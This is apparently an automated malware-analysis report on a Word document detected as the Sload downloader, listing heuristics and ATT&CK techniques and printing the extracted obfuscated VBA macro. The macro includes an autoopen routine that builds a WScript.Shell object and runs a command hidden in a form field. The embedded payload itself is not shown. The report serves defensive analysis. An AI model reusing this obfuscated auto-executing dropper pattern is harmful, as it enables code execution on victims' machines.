Verdict: MALICIOUS
Risk Score: 290
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains VBA macros that use WScript.Shell and CreateObject to execute code, which indicates downloader or dropper functionality. The presence of an AutoOpen macro suggests automatic execution when the document is opened. ClamAV also identified this file as a downloader.
Heuristics (9)
- ClamAV: Doc.Downloader.Sload-6817537-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sload-6817537-0
- VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- WScript.Shell usage [critical] (OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script:
  Set ArubanGuilderid = virtualsz calculateva = "WscRipt.sHeLl" Set Woodenow = schemasja
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  Set Rubberwo = Lightvo Operationsot = Array(Tuvaluro, ivorysc, Georgiazb, CreateObject("" + interfacefz + Strategistjb + olivehz + Boliviaav + Mountainstj + calculateva).Run!(("" + paymentko + Concretecc + THXnw + Squaretl + Manoraq.TextBox1) + Harborspv + securedlinedv + schemaszl, 50 - 50), Internalqs, BulgarianLevfa, Bangladeshzu) Set Pinewj = Factorsjv
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  End Function Sub autoopen() multibyteii = Avonvf
- Reference to Windows Script Host [high] (SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: eb4a4396cbec9af2ea6d485b81f2006368990eaf0f67cc3406699a6e21eeaedf) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7911 bytes |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Manoraq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "panelcs"
Function marketsqz()
On Error Resume Next
Set Granitenm = Optimizationjt
Set Directpa = Burgskq
Select Case bluecq
Case 726
contentrw = Streetlb
NorwegianKroneom = CLng(58)
Case 248
CheckingAccountlr = CLng(478)
paymentrn = CDate(pinkdh)
Dobrajz = Int(751)
Case 198
realtimeww = Cos(Gorgeousiw)
PracticalFreshHatia = ChrB(560)
Avonaf = hackingqp
End Select
Set Indianaau = arraynq
Set Mexicokc = ElectronicsClothingva
Set Woodenzi = Customermd
Select Case auxiliarykw
Case 866
impactfullu = projectfj
collaborationii = CLng(719)
Case 553
Villagetd = CLng(784)
magentaqi = CDate(Amelioratedft)
Plannerzh = Int(23)
Case 561
optimaliz = Cos(calculatingqq)
neuralws = ChrB(156)
Districtwa = Interactionspj
End Select
Set Brookua = Wisconsinhp
Set withdrawalpw = neuralfu
Set purplewi = verticalaj
Select Case holisticvc
Case 488
opensourcekr = Principalnm
zerotolerancewm = CLng(684)
Case 647
Arizonarm = CLng(365)
disintermediatetl = CDate(hierarchyqa)
alarmjq = Int(812)
Case 438
withdrawalki = Cos(Mountainstr)
Healthwb = ChrB(716)
Berkshireuw = AutoLoanAccountmz
End Select
Set ArubanGuilderid = virtualsz
calculateva = "WscRipt.sHeLl"
Set Woodenow = schemasja
Set richno = Pointns
Select Case Knollpl
Case 516
conglomerationlj = backuprw
Refinedst = CLng(422)
Case 62
Marylandit = CLng(474)
morphjf = CDate(HomeLoanAccountmz)
TastyPlasticChickenha = Int(139)
Case 965
Buckinghamshirewc = Cos(Musicts)
navigatingjv = ChrB(830)
magentazb = auxiliarycr
End Select
Set Rubberwo = Lightvo
Operationsot = Array(Tuvaluro, ivorysc, Georgiazb, CreateObject("" + interfacefz + Strategistjb + olivehz + Boliviaav + Mountainstj + calculateva).Run!(("" + paymentko + Concretecc + THXnw + Squaretl + Manoraq.TextBox1) + Harborspv + securedlinedv + schemaszl, 50 - 50), Internalqs, BulgarianLevfa, Bangladeshzu)
Set Pinewj = Factorsjv
Set Kansasvr = communitieskz
Select Case Berkshirehw
Case 59
tealam = JSONqj
Coordinatordu = CLng(782)
Case 861
panelhl = CLng(281)
fullrangelr = CDate(Islandpc)
Routebs = Int(499)
Case 737
Louisianacw = Cos(onetoonebp)
B2Bjr = ChrB(873)
virtualom = Rubberzl
End Select
Set Sharableah = JBODpi
Set missioncriticalwk = Lesothocj
Set Configurationcp = Plasticmb
Select Case Architectsi
Case 785
SingaporeDollarwi = withdrawaldp
bypassingrb = CLng(52)
Case 859
connectow = CLng(214)
uniformbs = CDate(onetoonewz)
Concreteto = Int(222)
Case 193
focusgroupiw = Cos(Skywayiw)
Metalwl = ChrB(532)
dynamictw = Ouguiyamu
End Select
Set growub = Generican
Set Gardenszb = Mobilityam
Set Concretekt = Concretekn
Select Case reinventpv
Case 781
Directivesws = Dynamiclj
RefinedSteelBikehl = CLng(138)
Case 759
USDollarsz = CLng(993)
Rwandaqa = CDate(JSONaj)
copyzm = Int(432)
Case 348
transmitla = Cos(ClothingBooksGardenip)
opticaldc = ChrB(326)
Fantasticaj = synthesizeqd
End Select
Set BabyKidsMusicbq = supplychainszo
End Function
Attribute VB_Name = "Borderslw"
Function analyzingoi()
Keybp = Qualityuk
Managerpw = plumkt
paymentjj = circuitld
Woodenjq = IncredibleConcreteSoapis
evenkeeledfj = pinkif
Plasticbs = Gamesat
clicksandmortarlf = SmallMetalTunahw
motivatingfn = programkc
Inletso = meshhj
Alabamaif = calculatest
redundantsh = fullrangeiw
indexun = copyingvz
End Function
Function Humando()
demanddrivenut = CreditCardAccounttj
SDDqt = generatingfu
Borderswq = Gorgeouscs
indexinghr = arrayzj
MoneyMarketAccountuw = Forwardzb
withdrawalbk = opensourcein
limemd = XSSaf
Reverseengineeredkq = GorgeousSoftShirtim
targetda = PersonalLoanAccountzl
Bedfordshirelo = capacitorci
Dominicacd = Nevadajd
SouthDakotalt = Metalid
End Function
Sub autoopen()
multibyteii = Avonvf
Universalzh = Principalns
Avonfd = Triplebufferedof
bricksandclickszd = revolutionizezz
Kazakhstantd = LicensedGraniteChickenkd
calculatecw = HandcraftedFreshComputerbr
Metaltm = Array(ErgonomicFreshSoapdu, Intranethz, multibyteiv, marketsqz, turquoisequ, Portsif, Hollowfd)
LicensedRubberCheesefc = SMSci
Shoeswq = capabilityij
Licensedtf = bypassingtc
Bermudawr = transmittz
auxiliaryzh = ErgonomicSoftCheesewd
backupis = Functionalityru
End Sub
Function Fordsf()
overridingpq = Parkwaytr
analyzingsz = GorgeousCottonTunavd
Beautyjh = Throughwaypj
rebootdh = NorthernMarianaIslandslj
engineerqu = quantifyingju
customizedvf = circuitaz
Clothingtj = Refinedss
Steelsz = standardizationbi
morphbd = redundantsu
AwesomeCottonKeyboardwj = Assistantwn
Iowabc = Leadrl
Fantasticji = Fordtz
End Function
Attribute VB_Name = "Brookbj"
Attribute VB_Name = "Commonvw"
Attribute VB_Name = "Patacamw"
Attribute VB_Name = "greenzw"
Attribute VB_Name = "HandmadeRubberMousezr"
Attribute VB_Name = "turquoiseqo"
Attribute VB_Name = "TastyCottonTunaad"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "programcm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "datawarehousefo"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "supplychainsiz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "streamlinepj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "AwesomeWoodenCarsp"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False